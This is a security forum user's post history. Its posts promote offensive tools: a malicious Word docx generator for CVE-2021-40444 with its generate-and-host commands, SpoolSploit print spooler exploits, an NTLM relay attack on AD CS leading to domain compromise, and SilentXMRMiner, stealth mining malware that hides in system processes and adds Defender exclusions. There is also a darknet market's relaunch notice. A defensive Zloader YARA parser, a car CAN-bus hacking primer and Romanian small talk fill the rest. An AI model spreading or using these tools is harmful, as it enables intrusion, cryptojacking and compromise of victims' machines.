Jump to content

bio.sh

Active Members
  • Posts

    147
  • Joined

  • Days Won

    20

Everything posted by bio.sh

      • 2
      • Upvote
  1. Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCE.md for manual reproduce steps If your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system() python3 exploit.py generate test/calc.dll http://<SRV IP> Once you generate the malicious docx (will be at out/) you can setup the server: sudo python3 exploit.py host 80 Finally try the docx in a Windows Virtual Machine: Download Link : https://github.com/lockedbyte/CVE-2021-40444
  2. ```from mwcp.parser import Parser import struct import string import pefile import yara import re from Crypto.Cipher import ARC4 import logging log = logging.getLogger(__name__) rule_source = ''' rule Zloader { meta: description = "Zloader Payload" cape_type = "Zloader Payload" strings: $rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)} $decrypt_conf = {e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 e8 ?? ?? ?? ??} condition: uint16(0) == 0x5A4D and any of them } ''' MAX_STRING_SIZE = 32 yara_rules = yara.compile(source=rule_source) def decrypt_rc4(key, data): cipher = ARC4.new(key) return cipher.decrypt(data) def string_from_offset(data, offset): string = data[offset : offset + MAX_STRING_SIZE].split(b"\0")[0] return string class Zloader(Parser): DESCRIPTION = 'Zloader configuration parser' def run(self): filebuf = self.file_object.file_data pe = pefile.PE(data=filebuf, fast_load=False) image_base = pe.OPTIONAL_HEADER.ImageBase matches = yara_rules.match(data=filebuf) if not matches: return for match in matches: if match.rule != "Zloader": continue for item in match.strings: if '$decrypt_conf' in item[1]: decrypt_conf = int(item[0])+21 va = struct.unpack("I",filebuf[decrypt_conf:decrypt_conf+4])[0] key = string_from_offset(filebuf, pe.get_offset_from_rva(va-image_base)) data_offset = pe.get_offset_from_rva(struct.unpack("I",filebuf[decrypt_conf+5:decrypt_conf+9])[0]-image_base) enc_data = filebuf[data_offset:].split(b"\0\0")[0] raw = decrypt_rc4(key, enc_data) items = list(filter(None, raw.split(b'\x00\x00'))) self.reporter.add_metadata("other", {"Botnet name": items[1].lstrip(b'\x00')}) self.reporter.add_metadata("other", {"Campaign ID": items[2]}) for item in items: item = item.lstrip(b'\x00') if item.startswith(b'http'): self.reporter.add_metadata("address", item) elif len(item) == 16: self.reporter.add_metadata("other", {"RC4 key": item}) return```
  3. SpoolSploit: collection of Windows print spooler exploits Summary SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access. Download link : https://github.com/BeetleChunks/SpoolSploit#create-and-access-the-spoolsploit-docker-container
  4. The goal of this article is to get you started hacking cars — fast, cheap, and easy. In order to do this, we’ll spoof the RPM gauge as an example. The following is by no means an exhaustive tutorial. It instead aims to provide just enough information to get you up and running. If you want to dig deeper you can checkout the must-reads at the end. If you decide to carry out this tutorial in real life, you’ll need a Linux computer (or a virtual Linux machine), and a CAN-to-USB device (which we’ll look into later). A car is a network A car consists of multiple computers to control the engine, transmission, windows, locks, lights, etc. These computers are called electronic control units (ECU) and communicate with each other over a network. For example, when you press the button on your steering wheel to increase the volume of the radio, the steering wheel ECU sends a command to increase volume onto the network, the radio ECU then sees this command and acts accordingly. There are multiple networks in a car, generally at least two: One for critical data such as engine and powertrain messages And one for less critical data such as radio and door locks The critical network uses a fast and reliable protocol whereas the non-critical network uses a slower, less reliable but cheaper protocol. The number of networks as well as which ECUs are networked together depends on the car make, model and year. An ECU could also be connected to multiple networks. Reference link : https://www.freecodecamp.org/news/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec/ Connecting to a network Some networks can be accessed via the OBD-II port. OBD-II is mandatory on all cars and light trucks built in the US after 1996 and Europe after 2004. The connector is in arms reach of the driver’s seat. You might need to lift off some plastic cover but it is always accessible without tools. Software To communicate with the device you need to install the can-utils package on your Linux machine. You can do this via by typing the following into the Linux prompt: sudo apt-get install can-utils Can-utils makes it extremely easy to send, receive and analyze CAN packets. These are the commands that we will use. cansniffer display only the packets that are changing candump dump all received packets cansend send a packet Linux has CAN support built in to the kernel via SocketCAN. This makes it easy to write your own additional programs. You can interact with the CAN bus in the same way you would interact with any other network i.e. via sockets.
      • 2
      • Upvote
      • Like
  5. Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different directory objects. However, it could allow red team operators to conduct an NTLM relay attack towards the web interface of an AD CS in order to compromise the network. The web interface is used for allowing users to obtain a certificate (web enrollment), is over HTTP protocol, doesn’t support signing and accepts NTLM authentication. The details of the attack have been presented by Will Schroeder and Lee Christensen in the Certified Pre-Owned whitepaper. The attack forces the domain controller machine account (DC$) to authenticate towards a host which NTLM relay is configured. The authentication is relayed towards the Certificate Authority (CA) and raises a request for a certificate. Once the certificate is generated for the DC$ account an attacker could use this perform arbitrary operations on the domain controller such as retrieving the hash of the Kerberos account in order to create a golden ticket and establish domain persistence or dump hashes of domain administrators and establish a communication channel with the domain controller. Reference link , more info and examples : https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/
  6. SilentXMRMiner v1.4.4 - Based on Lime Miner v0.3 Can mine all the following algorithms and thus all the cryptocurrencies that use them: List of algorithms Main Features .NET - Coded in C#, requires .NET Framework 4.5 Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or some other process CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD) Idle Mining - Can be configured to mine at different usages or not at all while computer is or isn't in use Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses Online Downloader - Can download the miner binary during runtime to greatly decrease file size and detections Download Links : https://github.com/UnamSanctam/SilentXMRMiner https://github.com/UnamSanctam/SilentETHMiner
      • 1
      • Like
  7. As baga niste mici
  8. dc dreacu ai deschide asemenea fisier cu un editor?clar il omori :))... why not less/more?sau split cum ti-a zis si kev
  9. Preturi europene, salarii africane, sistem de rahat... Scapa cine poate
  10. Obs si ftp?
  11. ti-am lasat de atunci un pm cu ceva similar...vezi daca te ajuta cu ceva
  12. ahem...royal crypter
  13. Asta da, mai putini bani, mai putine cerinte, mai usor de controlat ... ca asa e la noi
  14. Te aduce pana la usa companiei si te face sa realizezi ca ti-ai aruncat banii pe geam in loc sa faci o certificare ca lumea
  15. renunta la ideea de comptia sec+...ai alte certs care sunt worth while
  16. You read that right, AlphaB** is back. If you do not know who we are a quick search on the Internet provides enough information. I am DeSnake, security administrator and co-founder of AlphaB**. The following message is signed with authentic key. My original PGP key which expired 8th March 2019 has been extended. The key has the same fingerprint (95E7 766E 6AC8 AECD 1B6F 11A5 0E28 8FD2 E281 93C0) only expiry date now is up until July 3rd 2031. Off topic
  17. Nu neaparat, dar vreau sa fiu in forma pana ne vedem ...am auzit ca cine se imbata primul plateste
  18. Ma apuc de baut de pe acum...sa nu ma plictisesc...
  19. Nu vreau sa fiu "that guy" dar gasesti ce cauti in google in primele search-uri ... care face bypass la cele enumerate mai sus de tine
×
×
  • Create New...